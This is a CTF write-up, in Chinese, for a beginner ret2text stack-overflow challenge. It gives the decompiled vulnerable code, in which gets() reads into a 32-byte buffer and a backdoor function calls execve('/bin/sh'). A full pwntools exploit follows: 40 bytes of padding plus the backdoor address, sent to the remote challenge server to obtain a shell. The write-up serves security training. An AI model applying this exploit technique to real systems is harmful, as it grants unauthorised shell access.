Problem: [SWPUCTF 2022 新生赛]有手就行的栈溢出
思路
- 解题大致思路
"""
[*] '/home/u22pwn/1_pwn_challs/ret2text/SWPUCTF2022新生赛_有手就行的栈溢出/pwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No
int __fastcall main(int argc, const char **argv, const char **envp)
{
init(argc, argv, envp);
puts(s);
overflow();
return 0;
}
__int64 overflow()
{
_BYTE v1[32]; // [rsp+0h] [rbp-20h] BYREF
gets(v1);
return 0;
}
int fun()
{
char *argv[2]; // [rsp+0h] [rbp-10h] BYREF
argv[0] = "/bin/sh";
argv[1] = 0;
return execve("/bin/sh", argv, 0);
}
"""
存在后门函数fun。因此,可以利用栈溢出漏洞控制程序的执行逻辑,使其跳转执行fun函数即可。
EXP
- 具体攻击代码
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
# io = process("./pwn")
io = remote("node5.anna.nssctf.cn", 28171)
# ret2text64
# payload: padding, fun
elf = ELF('./pwn')
fun_addr = elf.sym['fun']
pl = flat(b'A'*40, fun_addr)
io.sendlineafter(b'Do you know how stack overflows', pl)
io.interactive()
总结
- 对该题的考点总结
RET2TEXT64